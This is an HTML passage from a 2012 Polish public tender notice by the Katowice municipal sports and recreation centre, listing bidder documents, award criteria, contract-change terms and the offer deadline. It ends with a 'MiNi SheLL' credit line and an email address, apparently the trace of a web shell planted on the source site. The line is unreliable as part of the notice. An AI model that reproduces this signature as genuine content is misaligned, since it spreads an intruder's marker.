<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Oferta na formularzu oferty, o treści zgodnej z określoną we wzorze stanowiącym  załącznik  do SIWZ.
2.	Szczegółowy kosztorys ofertowy, sporządzony zgodnie z kosztorysem zerowym stanowiącym załącznik do siwz. Kosztorys musi uwzględniać wszystkie pozycje kosztorysu zerowego.
3.	Oświadczenie Wykonawcy, o treści określonej w art. 22 ust. 1 - że Wykonawca może ubiegać się o udzielenie zamówienia, wg wzoru stanowiącego załącznik  do SIWZ
4. Oryginał dokumentu potwierdzającego wniesienie wadium w innej formie niż w pieniądzu (gwarancje bezwarunkowe i płatne na pierwsze żądanie) lub kserokopia poświadczona za zgodność z oryginałem potwierdzająca wniesienie wadium  przelewem na konto bankowe.
5. W przypadku gdy wykonawcy wspólnie ubiegają się o udzielenie zamówienia (np. spółki cywilne, konsorcja) - wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Fakt ustanowienia pełnomocnika należy udokumentować dołączeniem pełnomocnictwa podpisanego przez wszystkich wykonawców wspólnie ubiegających się o zamówienie. Pełnomocnictwo winno być w formie oryginału lub notarialnie poświadczonej kopii.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>3.	Zamawiający dopuszcza możliwość wprowadzenia zmian do zawartej umowy w przypadku:
1)	zaistnienia nadzwyczajnej okoliczności której nie można było przewidzieć w chwili zawarcia umowy wynikającej z potrzeby zmiany np. dokumentacji, a zmiana ta jest korzystna dla zamawiającego,
2)	konieczności zmiany osób wskazanych jako kierownik budowy/robót i przedstawiciel Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.um.katowice.pl/jednostki/mosir/bip<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Sportu i Rekreacji, Al. Korfantego 35, 40-005 Katowice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.06.2012 godzina 09:00, miejsce: Miejski Ośrodek Sportu i Rekreacji, Al. Korfantego 35, 40-005 Katowice, pokój nr 8 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com